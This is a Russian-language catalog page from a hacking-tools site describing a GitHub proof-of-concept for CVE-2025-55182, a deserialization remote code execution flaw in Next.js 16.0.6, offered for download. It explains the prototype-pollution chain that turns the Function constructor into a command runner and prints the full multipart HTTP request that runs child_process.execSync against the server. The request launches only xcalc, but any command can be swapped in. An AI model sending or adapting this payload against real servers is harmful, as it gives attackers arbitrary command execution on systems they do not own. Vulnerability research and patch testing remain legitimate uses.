Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-RCE-Exploit — Более ориентированный на эксплойты; отлично подходит для репозиториев по исследованию безопасности. | Kitploit
Инструменты/GitHubGitHub/orgito1015/cve-2025-55182-rce-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСтатьи и ИсследованияОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHuborgito1015/cve-2025-55182-rce-exploit

CVE-2025-55182-RCE-Exploit

Более ориентированный на эксплойты; отлично подходит для репозиториев по исследованию безопасности.

Репозиторий
29 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

POC для CVE-2025-55182 – Удаленное выполнение кода в Next.js 16.0.6

Этот репозиторий содержит рабочий proof-of-concept (POC) для CVE-2025-55182, критической уязвимости десериализации, затрагивающей Next.js 16.0.6. Эксплойт использует десериализацию фрагментов $@ и Chunk.prototype.then для получения полного контроля над процессом разрешения фрагментов и достижения произвольного выполнения кода (RCE) на сервере.

Сводка уязвимости

Next.js использует внутренние объекты Chunk и механизм потоковой десериализации для серверных действий. Злоупотребляя $@ для десериализации ссылки на Chunk и внедряя Chunk.prototype.then в корневой объект, атакующий может:

  • Заставить Next.js вызывать then(...) с , управляемым атакующим
this
  • Установить status фрагмента в resolved_model
  • Вызвать initializeModelChunk с поддельным фрагментом, полностью контролируемым атакующим
  • Злоупотреблять методами chunk._response для доступа к опасному внутреннему поведению
  • Конечная цель — вызвать десериализацию Blob, которая выполняет вызов типа:

    root@kitploit:~
    response._formData.get(response._prefix)
    

    Установив response._formData.get = Function и поместив произвольный код в response._prefix, атакующий может выполнить произвольные системные команды.

    Эксплойт POC

    HTTP-запрос в poc/CVE-2025-55182.http демонстрирует эксплойт против Next.js 16.0.6, запущенного локально, с запуском xcalc через child_process.execSync:

    root@kitploit:~
    POST / HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
    Next-Action: x
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Length: 459
    
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="0"
    
    {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="1"
    
    "$@0"
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
    

    Структура репозитория

    root@kitploit:~
    /
    ├── README.md
    ├── DISCLAIMER.md
    ├── poc/
    │   └── CVE-2025-55182.http
    └── analysis/
        └── exploitation-notes.md
    

    Отказ от ответственности

    Этот проект предоставлен исключительно в образовательных и исследовательских целях. НЕ используйте этот эксплойт в системе, которой вы не владеете или на тестирование которой у вас нет явного письменного разрешения.

    Автор не несет ответственности за любое неправомерное использование или причиненный ущерб.

    Скачать инструмент